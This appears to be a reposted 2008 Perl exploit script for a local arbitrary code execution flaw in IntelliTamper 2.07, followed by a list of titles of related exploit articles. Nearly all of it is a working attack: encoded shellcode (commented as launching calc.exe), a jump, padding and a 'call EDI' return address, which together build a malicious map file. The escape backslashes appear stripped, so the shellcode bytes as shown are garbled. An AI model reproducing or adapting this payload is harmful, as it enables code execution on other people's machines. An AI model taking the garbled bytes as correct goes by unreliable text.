#!/usr/bin/perl

# k`sOSe - 7/21/2008

# /advisories/20172

# A sploit for an ancient vuln. Just because i need

# to improve my skills on windows explotation.

use warnings;

use strict;

# CMD="c:windowssystem32calc.exe"

# [*] x86/alpha_mixed succeeded, final size 345

# bad char -> x89

my $shellcode =

"x54x5axdaxd0xd9x72xf4x59x49x49x49x49x49x49x49" .

"x49x49x49x49x43x43x43x43x43x43x37x51x5ax6ax41" .

"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42" .

"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b" .

"x4cx4ax48x47x34x43x30x45x50x45x50x4cx4bx51x55" .

"x47x4cx4cx4bx43x4cx43x35x44x38x45x51x4ax4fx4c" .

"x4bx50x4fx42x38x4cx4bx51x4fx51x30x43x31x4ax4b" .

"x51x59x4cx4bx46x54x4cx4bx45x51x4ax4ex46x51x49" .

"x50x4ax39x4ex4cx4cx44x49x50x44x34x43x37x49x51" .

"x49x5ax44x4dx43x31x48x42x4ax4bx4cx34x47x4bx50" .

"x54x51x34x44x44x42x55x4ax45x4cx4bx51x4fx46x44" .

"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51" .

"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31" .

"x4ax4bx4dx59x51x4cx46x44x45x54x48x43x51x4fx46" .

"x51x4cx36x43x50x51x46x43x54x4cx4bx50x46x50x30" .

"x4cx4bx47x30x44x4cx4cx4bx44x30x45x4cx4ex4dx4c" .

"x4bx42x48x44x48x4cx49x4bx48x4dx53x49x50x42x4a" .

"x46x30x45x38x4ax50x4dx5ax45x54x51x4fx45x38x4a" .

"x38x4bx4ex4cx4ax44x4ex50x57x4bx4fx4dx37x45x33" .

"x47x4ax51x4cx42x57x43x59x42x4ex43x54x42x4fx44" .

"x37x42x53x51x4cx44x33x44x39x44x33x44x34x43x55" .

"x42x4dx46x53x47x42x51x4cx43x53x43x51x42x4cx45" .

"x33x46x4ex42x45x43x48x43x55x45x50x45x5ax41x41";

print "### SITEMAP1 INTELLITAMPERn" .

"x41x41" .

"xebx20" . # jump ahead

"FOLDER##" .

"x41" x 24 .

$shellcode .

"E" x 108 .

"x59x51x3dx7e" . # ASCII friendly 'call EDI'

"AAAAn";

【IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)】相关文章：

★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

★ WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

★ Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

★ DreamNews Manager (id) Remote SQL Injection Vulnerability

★ 如何快速的检测电脑是否中毒了

★ MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

★ IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit

★ SoftICE for WIN95中文命令解说(六)

★ e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

★ mssql2005 DB权限导出一句话